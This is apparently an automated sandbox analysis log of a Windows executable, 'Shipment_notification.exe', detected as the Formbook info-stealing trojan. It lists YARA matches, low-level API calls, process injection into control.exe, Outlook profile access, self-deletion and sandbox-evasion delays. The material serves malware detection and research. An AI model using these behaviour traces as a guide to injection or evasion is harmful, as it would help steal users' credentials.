Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 0_2_00A7C844 0_2_00A7C844
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 0_2_00A7F1E8 0_2_00A7F1E8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 0_2_00A7F1F8 0_2_00A7F1F8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00403853 2_2_00403853
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0042202A 2_2_0042202A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0042309D 2_2_0042309D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004229D0 2_2_004229D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00422200 2_2_00422200
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00421A3A 2_2_00421A3A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00401B30 2_2_00401B30
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00422461 2_2_00422461
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004055AD 2_2_004055AD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004055B3 2_2_004055B3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00421E42 2_2_00421E42
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004206A3 2_2_004206A3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00422752 2_2_00422752
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004057D3 2_2_004057D3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040BF90 2_2_0040BF90
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040BF93 2_2_0040BF93
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040179B 2_2_0040179B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004017A0 2_2_004017A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEF900 2_2_01AEF900
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB20A8 2_2_01BB20A8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFB090 2_2_01AFB090
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1002 2_2_01BA1002
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1EBB0 2_2_01B1EBB0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB2B28 2_2_01BB2B28
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB22AE 2_2_01BB22AE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12581 2_2_01B12581
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFD5E0 2_2_01AFD5E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE0D20 2_2_01AE0D20
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB2D07 2_2_01BB2D07
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB1D55 2_2_01BB1D55
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF841F 2_2_01AF841F
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB1FF1 2_2_01BB1FF1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB2EF7 2_2_01BB2EF7
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: String function: 01AEB150 appears 35 times
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E5A3 NtCreateFile, 2_2_0041E5A3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E653 NtReadFile, 2_2_0041E653
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E6D3 NtClose, 2_2_0041E6D3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E783 NtAllocateVirtualMemory, 2_2_0041E783
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E64E NtReadFile, 2_2_0041E64E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E77D NtAllocateVirtualMemory, 2_2_0041E77D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E7FD NtAllocateVirtualMemory, 2_2_0041E7FD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B299A0 NtCreateSection,LdrInitializeThunk, 2_2_01B299A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01B29910
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B298F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_01B298F0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01B29860
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29840 NtDelayExecution,LdrInitializeThunk, 2_2_01B29840
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A20 NtResumeThread,LdrInitializeThunk, 2_2_01B29A20
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01B29A00
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A50 NtCreateFile,LdrInitializeThunk, 2_2_01B29A50
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B295D0 NtClose,LdrInitializeThunk, 2_2_01B295D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29540 NtReadFile,LdrInitializeThunk, 2_2_01B29540
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B297A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_01B297A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01B29780
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01B29FE0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01B29710
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B296E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01B296E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01B29660
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B299D0 NtCreateProcessEx, 2_2_01B299D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29950 NtQueueApcThread, 2_2_01B29950
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B298A0 NtWriteVirtualMemory, 2_2_01B298A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29820 NtEnumerateKey, 2_2_01B29820
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2B040 NtSuspendThread, 2_2_01B2B040
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A3B0 NtGetContextThread, 2_2_01B2A3B0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29B00 NtSetValueKey, 2_2_01B29B00
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A80 NtOpenDirectoryObject, 2_2_01B29A80
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A10 NtQuerySection, 2_2_01B29A10
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B295F0 NtQueryInformationFile, 2_2_01B295F0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2AD30 NtSetContextThread, 2_2_01B2AD30
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29520 NtWaitForSingleObject, 2_2_01B29520
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29560 NtWriteFile, 2_2_01B29560
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29730 NtQueryVirtualMemory, 2_2_01B29730
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A710 NtOpenProcessToken, 2_2_01B2A710
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29770 NtSetInformationFile, 2_2_01B29770
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A770 NtOpenThread, 2_2_01B2A770
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29760 NtOpenProcess, 2_2_01B29760
Source: Shipment_notification.exe, 00000000.00000002.340502146.00000000035E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.336955451.0000000002627000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.353586112.0000000006DF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000003.333262180.00000000018A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001A43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A85000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000002.378214888.0000000001BDF000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
Source: Shipment_notification.exe Binary or memory string: OriginalFilenameCYYO.exe> vs Shipment_notification.exe
Source: Shipment_notification.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Shipment_notification.exe ReversingLabs: Detection: 39%
Source: Shipment_notification.exe Virustotal: Detection: 43%
Source: C:\Users\user\Desktop\Shipment_notification.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\Shipment_notification.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment_notification.exe.log
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\10W12dX
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/3@12/7
Source: Shipment_notification.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Shipment_notification.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Shipment_notification.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Shipment_notification.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Shipment_notification.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: CYYO.pdb source: Shipment_notification.exe
Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00411824 push ds; ret 2_2_00411825
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004108E0 push ecx; retf 2_2_004108E1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041BC00 push eax; iretd 2_2_0041BC01
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00410CF7 push ecx; iretd 2_2_00410D0E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041A550 push ecx; retf 2_2_0041A55A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041B56C push ss; retf 2_2_0041B56D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041A523 push edx; ret 2_2_0041A524
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00405DEB push 00000056h; retf 2_2_00405DEF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00401D80 push eax; ret 2_2_00401D82
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041B5B8 pushad ; iretd 2_2_0041B5B9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00406E76 pushfd ; ret 2_2_00406E77
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00410631 push ecx; retf 2_2_00410632
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00405F31 push ss; iretd 2_2_00405F51
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B3D0D1 push ecx; ret 2_2_01B3D0E4
Source: initial sample Static PE information: section name: .text entropy: 7.877600970637655

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\shipment_notification.exe
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 1364 Thread sleep time: -40023s >= -30000s
Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 3648 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\control.exe TID: 4540 Thread sleep time: -44000s >= -30000s
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB5BA5 rdtsc 2_2_01BB5BA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 884
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 870
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread delayed: delay time: 40023
Source: explorer.exe, 00000003.00000003.548908442.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533768505.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535250683.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.560492432.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.582481631.0000000004424000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.550742798.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\Desktop\Shipment_notification.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h] 2_2_01B651BE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B669A6 mov eax, dword ptr fs:[00000030h] 2_2_01B669A6
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B161A0 mov eax, dword ptr fs:[00000030h] 2_2_01B161A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12990 mov eax, dword ptr fs:[00000030h] 2_2_01B12990
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0C182 mov eax, dword ptr fs:[00000030h] 2_2_01B0C182
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A185 mov eax, dword ptr fs:[00000030h] 2_2_01B1A185
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h] 2_2_01AEB1E1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B741E8 mov eax, dword ptr fs:[00000030h] 2_2_01B741E8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1513A mov eax, dword ptr fs:[00000030h] 2_2_01B1513A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h] 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 mov ecx, dword ptr fs:[00000030h] 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h] 2_2_01AE9100
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEC962 mov eax, dword ptr fs:[00000030h] 2_2_01AEC962
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEB171 mov eax, dword ptr fs:[00000030h] 2_2_01AEB171
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0B944 mov eax, dword ptr fs:[00000030h] 2_2_01B0B944
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1F0BF mov ecx, dword ptr fs:[00000030h] 2_2_01B1F0BF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1F0BF mov eax, dword ptr fs:[00000030h] 2_2_01B1F0BF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h] 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B290AF mov eax, dword ptr fs:[00000030h] 2_2_01B290AF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9080 mov eax, dword ptr fs:[00000030h] 2_2_01AE9080
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B63884 mov eax, dword ptr fs:[00000030h] 2_2_01B63884
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE58EC mov eax, dword ptr fs:[00000030h] 2_2_01AE58EC
